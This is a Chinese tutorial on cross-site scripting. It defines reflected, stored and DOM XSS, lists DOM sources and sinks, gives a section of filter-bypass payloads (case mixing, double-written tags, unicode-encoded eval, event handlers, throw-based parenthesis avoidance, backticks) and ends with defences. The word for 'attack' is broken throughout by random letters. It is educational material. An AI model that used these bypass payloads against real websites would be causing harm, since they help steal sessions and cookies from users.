一、XSS定义
XSS攻drt击(Cross Site Scripting),跨站脚本攻dry击,通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻sdf击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻dtg击成功后,攻dtrd击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。
二、XSS攻xdfg击的危害
1、盗取用户cookie,获取敏感信息
2、利用植入Flash,通过crossdomain权限设置进一步获取更高权限;或者利用Java等得到类似的操作。
3、利用iframe、frame、XMLHttpRequest或上述Flash等方式,以(被攻drt击)用户的身份执行一些管理动作,或执行一些一般的操作如发微博、加好友、发私信等操作。
4、利用可被攻sdf击的域受到其他域信任的特点,以受信任来源的身份请求一些平时不允许的操作,如进行不当的投票活动。
5、在访问量极大的一些页面上的XSS可以攻asd击一些小型网站,实现DDOS攻fgh击的效果。
三、分类
1、反射型XSS(非持久型)【前端 -> 后端 -> 前端】
非持久型的意思是该XSS攻zxc击相对于访问者而言是一次性的。攻zxc击者的恶意脚本通过url的方式向服务器发起请求,服务器解析后将XSS代码一起传回浏览器,最后浏览器执行相应的XSS脚本。
也就是说想要触发漏洞,需要访问特定的链接才能够实现。
举个简单例子:
http://www.a.com/xss/1.php
的代码如下:
<?php
echo $_GET['a'];
?>
如果输入a的值未经任何过滤就直接输出。
当输入以下内容
http://www.a.com/xss/1.php?a=<script>alert("K")</script>
则 alert() 函数会在浏览器触发。
2、存储型XSS(持久型)【前端 -> 后端 -> 数据库 -> 前端】
存储型XSS和反射型XSS的差别仅在于,提交的代码会存储在服务器端(数据库,内存,文件系统等),下次请求目标页面时不用再提交XSS代码。
最典型的例子是留言板XSS,攻asd击者提交一条包含XSS代码的留言存储到数据库,目标用户查看留言板时,那些留言的内容会从数据库查询出来并显示,浏览器执行XSS代码,触发了XSS攻asd击。
这个过程一般而言只要用户访问这个界面就行了,不需要访问特定的URL。
举个简单例子:
攻qwe击者在留言内容中输入一行:
<script>alert(“k”)</script>
那么留言板界面的网页代码会变成形如以下:
<html>
<head>
<title>留言板</title>
</head>
<body>
<div id=”board”
<script>alert(“k”)</script>
</div>
</body>
</html>
3、DOM XSS【前端】
DOM XSS和反射型XSS、存储型XSS的差别在于DOM XSS的代码并不需要服务器参与,触发XSS靠的是浏览器端的DOM解析,完全是客户端的事情。
举个简单例子:
http://www.a.com/xss/domxss.html
代码如下:
<script>
eval(location.hash.substr(1));
</script>
触发方式为:http://www.a.com/xss/domxss.html#alert(1)
这个 URL# 后的内容是不会发送到服务器端的,仅仅在客户端被接收并解执行。
- 常见的输入点有:
document.URL
document.URLUnencoded
document.location
document.referrer
window.location
window.nam
- XHR(XMLHttpRequest)请求回来的数据
document.cookie
- 直接输出html内容
document.write(...)
document.writeln(...)
document.body.innerHtml=...
- 直接修改DOM树(包括DHTML)
document.forms[0].action...(以及其他集合,如:一些对象的src/href属性等)
document.attachEvent(...)
document.create...(...)
document.execCommand(...)
document.body. ...(直接通过body对象访问DOM)
window.attachEvent(...)
- 替换document.URL
document.location=...(以及直接赋值给location的href,host,hostname属性)
document.location.hostname=...
document.location.replace(...)
document.location.assign(...)
document.URL=...
window.navigate(...)
- 打开或者修改新窗口
document.open(...)
window.open(...)
window.location.href=...(以及直接赋值给location的href,host,hostname属性)直接执行脚本,如:
eval(...)
window.execScript(...)
window.setInterval(...)
window.setTimeout(...)
四、常见绕过方法
1、大小写绕过
当网站仅过滤<script>或者<img>等标签,而没有考虑标签中的大小写并不影响浏览器的解析所致。如:
<sCript>alert("hey!")</scRipt>
<IMG SRC=JaVaScRiPt:alert('XSS')>
2、只过滤一个标签
例如:双写,让过滤完script标签后的语句中还有script标签
<sCri<script>pt>alert("hey!")</scRi</script>pt>
3、编码脚本代码绕过关键字过滤
当服务器对代码中的关键字(如alert)进行过滤,这个时候我们可以尝试将关键字进行编码后再插入,不过直接显示编码是不能被浏览器执行的,所以可以用另一个语句eval()来实现。eval()会将编码过的语句解码后再执行。
例如alert(1)Unicode编码过后就是:
\u0061\u006c\u0065\u0072\u0074(1)
所以构建出来的攻qwe击语句如下:
<script>eval(\u0061\u006c\u0065\u0072\u0074(1))</script>
同理还可以使用诸如url编码、Ascii码、base64、十六进制、八进制绕过等。
4、主动闭合标签实现注入代码
如以下两个例子:
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
";alert("I am coming again~");"
5、其他标签注入代码
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
//当用户鼠标移动时即可运行代码
<div onmouseover=‘do something here’>
//当用户鼠标在这个块上面时即可运行,可以配合weight等参数将div覆盖页面
<img src='k.7' onerror='alert("hey!")'>
//指定的图片地址不存在,即一定会发生错误,这时执行onerror里面的代码进行弹窗
6、字符拼接
<img src="x" onerror="a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)"> //利用eval
<script>top["al"+"ert"](`xss`);</script> //利用top
7、过滤括号
当括号被过滤的时候可以使用throw来绕过
<svg/onload="window.onerror=eval;throw'=alert\x281\x29';">
8、过滤单引号、双引号
如果是html标签中,我们可以不用引号。如果是在js中,我们可以用反引号代替单双引号。
<img src="x" onerror=alert(`xss`);>
9、过滤url地址
1)编码绕过
2)html标签中用 // 可以代替 http://
<img src="x" onerror=document.location=`//www.baidu.com`>
3)使用\\
在 windows下 \ 本身就有特殊用途,是一个 path 的写法,所以 \\ 在 Windows 下是 file协议,在 linux 下才是当前域的协议。
五、防范手段
1、过滤一些危险字符,以及转义 & < > " ' / 等危险字符U。
2、HTTP-only Cookie: 禁止 JavaScript 读取某些敏感 Cookie,攻xcv击者完成 XSS 注入后也无法窃取此Cookie。
3、设置CSP(Content Security Policy)。
4、输入内容长度限制。